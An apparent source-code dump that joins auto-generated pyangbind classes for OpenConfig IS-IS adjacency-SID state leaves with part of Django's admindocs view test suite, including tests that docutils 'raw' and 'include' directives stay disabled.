This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/mt-isn/neighbors/neighbor/subTLVs/subTLVs/adjacency-sid/sid/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: State parameters of Adjacency-SID.
"""
__slots__ = ("_path_helper", "_extmethods", "__value", "__flags", "__weight")
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__value = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="value",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
self.__flags = YANGDynClass(
base=TypedListType(
allowed_type=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADDRESS_FAMILY": {},
"BACKUP": {},
"VALUE": {},
"LOCAL": {},
"SET": {},
},
)
),
is_leaf=False,
yang_name="flags",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
self.__weight = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"levels",
"level",
"link-state-database",
"lsp",
"tlvs",
"tlv",
"mt-isn",
"neighbors",
"neighbor",
"subTLVs",
"subTLVs",
"adjacency-sid",
"sid",
"state",
]
def _get_value(self):
"""
Getter method for value, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/value (uint32)
YANG Description: Adjacency-SID value.
"""
return self.__value
def _set_value(self, v, load=False):
"""
Setter method for value, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/value (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_value is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_value() directly.
YANG Description: Adjacency-SID value.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="value",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """value must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="value", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
}
)
self.__value = t
if hasattr(self, "_set"):
self._set()
def _unset_value(self):
self.__value = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="value",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
def _get_flags(self):
"""
Getter method for flags, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/flags (enumeration)
YANG Description: Flags associated with Adj-Segment-ID.
"""
return self.__flags
def _set_flags(self, v, load=False):
"""
Setter method for flags, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/flags (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_flags is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_flags() directly.
YANG Description: Flags associated with Adj-Segment-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=TypedListType(
allowed_type=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADDRESS_FAMILY": {},
"BACKUP": {},
"VALUE": {},
"LOCAL": {},
"SET": {},
},
)
),
is_leaf=False,
yang_name="flags",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """flags must be of a type compatible with enumeration""",
"defined-type": "openconfig-network-instance:enumeration",
"generated-type": """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'ADDRESS_FAMILY': {}, 'BACKUP': {}, 'VALUE': {}, 'LOCAL': {}, 'SET': {}},)), is_leaf=False, yang_name="flags", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='enumeration', is_config=False)""",
}
)
self.__flags = t
if hasattr(self, "_set"):
self._set()
def _unset_flags(self):
self.__flags = YANGDynClass(
base=TypedListType(
allowed_type=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADDRESS_FAMILY": {},
"BACKUP": {},
"VALUE": {},
"LOCAL": {},
"SET": {},
},
)
),
is_leaf=False,
yang_name="flags",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
def _get_weight(self):
"""
Getter method for weight, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/weight (uint8)
YANG Description: Value that represents the weight of the Adj-SID for the purpose
of load balancing.
"""
return self.__weight
def _set_weight(self, v, load=False):
"""
Setter method for weight, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/weight (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_weight is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_weight() directly.
YANG Description: Value that represents the weight of the Adj-SID for the purpose
of load balancing.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """weight must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=False)""",
}
)
self.__weight = t
if hasattr(self, "_set"):
self._set()
def _unset_weight(self):
self.__weight = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
value = __builtin__.property(_get_value)
flags = __builtin__.property(_get_flags)
weight = __builtin__.property(_get_weight)
_pyangbind_elements = OrderedDict(
[("value", value), ("flags", flags), ("weight", weight)]
)
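# Minimal usage sketch (illustrative; the names match the generated API
# above):
#
#     s = state()
#     s._set_weight(10)    # ok: uint8, restricted to 0..255
#     s._set_weight(300)   # raises ValueError (out of range)
#     print(s.weight)      # read-only property backed by _get_weight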
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/mt-isn/neighbors/neighbor/subTLVs/subTLVs/adjacency-sid/sid/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: State parameters of Adjacency-SID.
"""
__slots__ = ("_path_helper", "_extmethods", "__value", "__flags", "__weight")
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__value = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="value",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
self.__flags = YANGDynClass(
base=TypedListType(
allowed_type=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADDRESS_FAMILY": {},
"BACKUP": {},
"VALUE": {},
"LOCAL": {},
"SET": {},
},
)
),
is_leaf=False,
yang_name="flags",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
self.__weight = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"levels",
"level",
"link-state-database",
"lsp",
"tlvs",
"tlv",
"mt-isn",
"neighbors",
"neighbor",
"subTLVs",
"subTLVs",
"adjacency-sid",
"sid",
"state",
]
def _get_value(self):
"""
Getter method for value, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/value (uint32)
YANG Description: Adjacency-SID value.
"""
return self.__value
def _set_value(self, v, load=False):
"""
Setter method for value, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/value (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_value is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_value() directly.
YANG Description: Adjacency-SID value.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="value",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """value must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="value", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
}
)
self.__value = t
if hasattr(self, "_set"):
self._set()
def _unset_value(self):
self.__value = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="value",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
def _get_flags(self):
"""
Getter method for flags, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/flags (enumeration)
YANG Description: Flags associated with Adj-Segment-ID.
"""
return self.__flags
def _set_flags(self, v, load=False):
"""
Setter method for flags, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/flags (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_flags is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_flags() directly.
YANG Description: Flags associated with Adj-Segment-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=TypedListType(
allowed_type=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADDRESS_FAMILY": {},
"BACKUP": {},
"VALUE": {},
"LOCAL": {},
"SET": {},
},
)
),
is_leaf=False,
yang_name="flags",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """flags must be of a type compatible with enumeration""",
"defined-type": "openconfig-network-instance:enumeration",
"generated-type": """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'ADDRESS_FAMILY': {}, 'BACKUP': {}, 'VALUE': {}, 'LOCAL': {}, 'SET': {}},)), is_leaf=False, yang_name="flags", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='enumeration', is_config=False)""",
}
)
self.__flags = t
if hasattr(self, "_set"):
self._set()
def _unset_flags(self):
self.__flags = YANGDynClass(
base=TypedListType(
allowed_type=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADDRESS_FAMILY": {},
"BACKUP": {},
"VALUE": {},
"LOCAL": {},
"SET": {},
},
)
),
is_leaf=False,
yang_name="flags",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
def _get_weight(self):
"""
Getter method for weight, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/weight (uint8)
YANG Description: Value that represents the weight of the Adj-SID for the purpose
of load balancing.
"""
return self.__weight
def _set_weight(self, v, load=False):
"""
Setter method for weight, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/weight (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_weight is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_weight() directly.
YANG Description: Value that represents the weight of the Adj-SID for the purpose
of load balancing.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """weight must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=False)""",
}
)
self.__weight = t
if hasattr(self, "_set"):
self._set()
def _unset_weight(self):
self.__weight = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
value = __builtin__.property(_get_value)
flags = __builtin__.property(_get_flags)
weight = __builtin__.property(_get_weight)
_pyangbind_elements = OrderedDict(
[("value", value), ("flags", flags), ("weight", weight)]
)
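# Illustrative usage sketch (assumptions, not part of the generated code):
# a pyangbind container is populated through its private setters and read
# back through the generated properties, with type checks applied, e.g.:
#
#     s = state()
#     s._set_weight(10)    # accepted: within the uint8 range 0..255
#     print(s.weight)      # -> 10
#     s._set_weight(300)   # raises ValueError (outside the uint8 range)
#
# Since every leaf here is is_config=False, these are operational-state
# values that backends fill in rather than user configuration.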
|
napalm-automation/napalm-yang
|
napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs_/adjacency_sid/sid/state/__init__.py
|
Python
|
apache-2.0
| 30,567 | 0.001374 |
import sys
import unittest
from django.conf import settings
from django.contrib.admindocs import utils, views
from django.contrib.admindocs.views import get_return_data_type, simplify_regex
from django.contrib.sites.models import Site
from django.db import models
from django.db.models import fields
from django.test import SimpleTestCase, modify_settings, override_settings
from django.test.utils import captured_stderr
from django.urls import reverse
from .models import Company, Person
from .tests import AdminDocsTestCase, TestDataMixin
@unittest.skipUnless(utils.docutils_is_available, "no docutils installed.")
class AdminDocViewTests(TestDataMixin, AdminDocsTestCase):
def setUp(self):
self.client.force_login(self.superuser)
def test_index(self):
response = self.client.get(reverse('django-admindocs-docroot'))
self.assertContains(response, '<h1>Documentation</h1>', html=True)
self.assertContains(response, '<h1 id="site-name"><a href="/admin/">Django administration</a></h1>')
self.client.logout()
response = self.client.get(reverse('django-admindocs-docroot'), follow=True)
# Should display the login screen
self.assertContains(response, '<input type="hidden" name="next" value="/admindocs/" />', html=True)
def test_bookmarklets(self):
response = self.client.get(reverse('django-admindocs-bookmarklets'))
self.assertContains(response, '/admindocs/views/')
def test_templatetag_index(self):
response = self.client.get(reverse('django-admindocs-tags'))
self.assertContains(response, '<h3 id="built_in-extends">extends</h3>', html=True)
def test_templatefilter_index(self):
response = self.client.get(reverse('django-admindocs-filters'))
self.assertContains(response, '<h3 id="built_in-first">first</h3>', html=True)
def test_view_index(self):
response = self.client.get(reverse('django-admindocs-views-index'))
self.assertContains(
response,
'<h3><a href="/admindocs/views/django.contrib.admindocs.views.BaseAdminDocsView/">/admindocs/</a></h3>',
html=True
)
self.assertContains(response, 'Views by namespace test')
self.assertContains(response, 'Name: <code>test:func</code>.')
def test_view_index_with_method(self):
"""
Views that are methods are listed correctly.
"""
response = self.client.get(reverse('django-admindocs-views-index'))
self.assertContains(
response,
'<h3><a href="/admindocs/views/django.contrib.admin.sites.AdminSite.index/">/admin/</a></h3>',
html=True
)
def test_view_detail(self):
url = reverse('django-admindocs-views-detail', args=['django.contrib.admindocs.views.BaseAdminDocsView'])
response = self.client.get(url)
# View docstring
self.assertContains(response, 'Base view for admindocs views.')
@override_settings(ROOT_URLCONF='admin_docs.namespace_urls')
def test_namespaced_view_detail(self):
url = reverse('django-admindocs-views-detail', args=['admin_docs.views.XViewClass'])
response = self.client.get(url)
self.assertContains(response, '<h1>admin_docs.views.XViewClass</h1>')
def test_view_detail_illegal_import(self):
url = reverse('django-admindocs-views-detail', args=['urlpatterns_reverse.nonimported_module.view'])
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
self.assertNotIn("urlpatterns_reverse.nonimported_module", sys.modules)
def test_view_detail_as_method(self):
"""
Views that are methods can be displayed.
"""
url = reverse('django-admindocs-views-detail', args=['django.contrib.admin.sites.AdminSite.index'])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_model_index(self):
response = self.client.get(reverse('django-admindocs-models-index'))
self.assertContains(
response,
'<h2 id="app-auth">Authentication and Authorization (django.contrib.auth)</h2>',
html=True
)
def test_template_detail(self):
response = self.client.get(reverse('django-admindocs-templates', args=['admin_doc/template_detail.html']))
self.assertContains(response, '<h1>Template: "admin_doc/template_detail.html"</h1>', html=True)
def test_missing_docutils(self):
utils.docutils_is_available = False
try:
response = self.client.get(reverse('django-admindocs-docroot'))
self.assertContains(
response,
'<h3>The admin documentation system requires Python\'s '
'<a href="http://docutils.sf.net/">docutils</a> library.</h3>',
html=True
)
self.assertContains(response, '<h1 id="site-name"><a href="/admin/">Django administration</a></h1>')
finally:
utils.docutils_is_available = True
@modify_settings(INSTALLED_APPS={'remove': 'django.contrib.sites'})
@override_settings(SITE_ID=None) # will restore SITE_ID after the test
def test_no_sites_framework(self):
"""
        Without the sites framework, the views should not access SITE_ID or Site
objects. Deleting settings is fine here as UserSettingsHolder is used.
"""
Site.objects.all().delete()
del settings.SITE_ID
response = self.client.get(reverse('django-admindocs-views-index'))
self.assertContains(response, 'View documentation')
@override_settings(TEMPLATES=[{
'NAME': 'ONE',
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
}, {
'NAME': 'TWO',
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
}])
@unittest.skipUnless(utils.docutils_is_available, "no docutils installed.")
class AdminDocViewWithMultipleEngines(AdminDocViewTests):
def test_templatefilter_index(self):
# Overridden because non-trivial TEMPLATES settings aren't supported
# but the page shouldn't crash (#24125).
response = self.client.get(reverse('django-admindocs-filters'))
self.assertContains(response, '<title>Template filters</title>', html=True)
def test_templatetag_index(self):
# Overridden because non-trivial TEMPLATES settings aren't supported
# but the page shouldn't crash (#24125).
response = self.client.get(reverse('django-admindocs-tags'))
self.assertContains(response, '<title>Template tags</title>', html=True)
@unittest.skipUnless(utils.docutils_is_available, "no docutils installed.")
class TestModelDetailView(TestDataMixin, AdminDocsTestCase):
def setUp(self):
self.client.force_login(self.superuser)
with captured_stderr() as self.docutils_stderr:
self.response = self.client.get(reverse('django-admindocs-models-detail', args=['admin_docs', 'Person']))
def test_method_excludes(self):
"""
Methods that begin with strings defined in
``django.contrib.admindocs.views.MODEL_METHODS_EXCLUDE``
shouldn't be displayed in the admin docs.
"""
self.assertContains(self.response, "<td>get_full_name</td>")
self.assertNotContains(self.response, "<td>_get_full_name</td>")
self.assertNotContains(self.response, "<td>add_image</td>")
self.assertNotContains(self.response, "<td>delete_image</td>")
self.assertNotContains(self.response, "<td>set_status</td>")
self.assertNotContains(self.response, "<td>save_changes</td>")
def test_methods_with_arguments(self):
"""
        Methods that take arguments should also be displayed.
"""
self.assertContains(self.response, "<h3>Methods with arguments</h3>")
self.assertContains(self.response, "<td>rename_company</td>")
self.assertContains(self.response, "<td>dummy_function</td>")
self.assertContains(self.response, "<td>suffix_company_name</td>")
def test_methods_with_arguments_display_arguments(self):
"""
Methods with arguments should have their arguments displayed.
"""
self.assertContains(self.response, "<td>new_name</td>")
def test_methods_with_arguments_display_arguments_default_value(self):
"""
Methods with keyword arguments should have their arguments displayed.
"""
self.assertContains(self.response, "<td>suffix='ltd'</td>")
def test_methods_with_multiple_arguments_display_arguments(self):
"""
Methods with multiple arguments should have all their arguments
displayed, but omitting 'self'.
"""
self.assertContains(self.response, "<td>baz, rox, *some_args, **some_kwargs</td>")
def test_method_data_types(self):
company = Company.objects.create(name="Django")
person = Person.objects.create(first_name="Human", last_name="User", company=company)
self.assertEqual(get_return_data_type(person.get_status_count.__name__), 'Integer')
self.assertEqual(get_return_data_type(person.get_groups_list.__name__), 'List')
def test_descriptions_render_correctly(self):
"""
The ``description`` field should render correctly for each field type.
"""
# help text in fields
self.assertContains(self.response, "<td>first name - The person's first name</td>")
self.assertContains(self.response, "<td>last name - The person's last name</td>")
# method docstrings
self.assertContains(self.response, "<p>Get the full name of the person</p>")
link = '<a class="reference external" href="/admindocs/models/%s/">%s</a>'
markup = '<p>the related %s object</p>'
company_markup = markup % (link % ("admin_docs.company", "admin_docs.Company"))
# foreign keys
self.assertContains(self.response, company_markup)
# foreign keys with help text
self.assertContains(self.response, "%s\n - place of work" % company_markup)
# many to many fields
self.assertContains(
self.response,
"number of related %s objects" % (link % ("admin_docs.group", "admin_docs.Group"))
)
self.assertContains(
self.response,
"all related %s objects" % (link % ("admin_docs.group", "admin_docs.Group"))
)
# "raw" and "include" directives are disabled
self.assertContains(self.response, '<p>"raw" directive disabled.</p>',)
self.assertContains(self.response, '.. raw:: html\n :file: admin_docs/evilfile.txt')
self.assertContains(self.response, '<p>"include" directive disabled.</p>',)
self.assertContains(self.response, '.. include:: admin_docs/evilfile.txt')
out = self.docutils_stderr.getvalue()
self.assertIn('"raw" directive disabled', out)
self.assertIn('"include" directive disabled', out)
def test_model_with_many_to_one(self):
link = '<a class="reference external" href="/admindocs/models/%s/">%s</a>'
response = self.client.get(
reverse('django-admindocs-models-detail', args=['admin_docs', 'company'])
)
self.assertContains(
response,
"number of related %s objects" % (link % ("admin_docs.person", "admin_docs.Person"))
)
self.assertContains(
response,
"all related %s objects" % (link % ("admin_docs.person", "admin_docs.Person"))
)
def test_model_with_no_backward_relations_render_only_relevant_fields(self):
"""
A model with ``related_name`` of `+` shouldn't show backward
relationship links.
"""
response = self.client.get(reverse('django-admindocs-models-detail', args=['admin_docs', 'family']))
fields = response.context_data.get('fields')
self.assertEqual(len(fields), 2)
def test_model_docstring_renders_correctly(self):
summary = (
'<h2 class="subhead"><p>Stores information about a person, related to <a class="reference external" '
'href="/admindocs/models/myapp.company/">myapp.Company</a>.</p></h2>'
)
subheading = '<p><strong>Notes</strong></p>'
body = '<p>Use <tt class="docutils literal">save_changes()</tt> when saving this object.</p>'
model_body = (
'<dl class="docutils"><dt><tt class="'
'docutils literal">company</tt></dt><dd>Field storing <a class="'
'reference external" href="/admindocs/models/myapp.company/">'
'myapp.Company</a> where the person works.</dd></dl>'
)
self.assertContains(self.response, 'DESCRIPTION')
self.assertContains(self.response, summary, html=True)
self.assertContains(self.response, subheading, html=True)
self.assertContains(self.response, body, html=True)
self.assertContains(self.response, model_body, html=True)
def test_model_detail_title(self):
self.assertContains(self.response, '<h1>admin_docs.Person</h1>', html=True)
class CustomField(models.Field):
description = "A custom field type"
class DescriptionLackingField(models.Field):
pass
class TestFieldType(unittest.TestCase):
def setUp(self):
pass
def test_field_name(self):
with self.assertRaises(AttributeError):
views.get_readable_field_data_type("NotAField")
def test_builtin_fields(self):
self.assertEqual(
views.get_readable_field_data_type(fields.BooleanField()),
'Boolean (Either True or False)'
)
def test_custom_fields(self):
self.assertEqual(views.get_readable_field_data_type(CustomField()), 'A custom field type')
self.assertEqual(
views.get_readable_field_data_type(DescriptionLackingField()),
'Field of type: DescriptionLackingField'
)
class AdminDocViewFunctionsTests(SimpleTestCase):
def test_simplify_regex(self):
tests = (
(r'^a', '/a'),
(r'^(?P<a>\w+)/b/(?P<c>\w+)/$', '/<a>/b/<c>/'),
(r'^(?P<a>\w+)/b/(?P<c>\w+)$', '/<a>/b/<c>'),
(r'^(?P<a>\w+)/b/(\w+)$', '/<a>/b/<var>'),
(r'^(?P<a>\w+)/b/((x|y)\w+)$', '/<a>/b/<var>'),
(r'^(?P<a>(x|y))/b/(?P<c>\w+)$', '/<a>/b/<c>'),
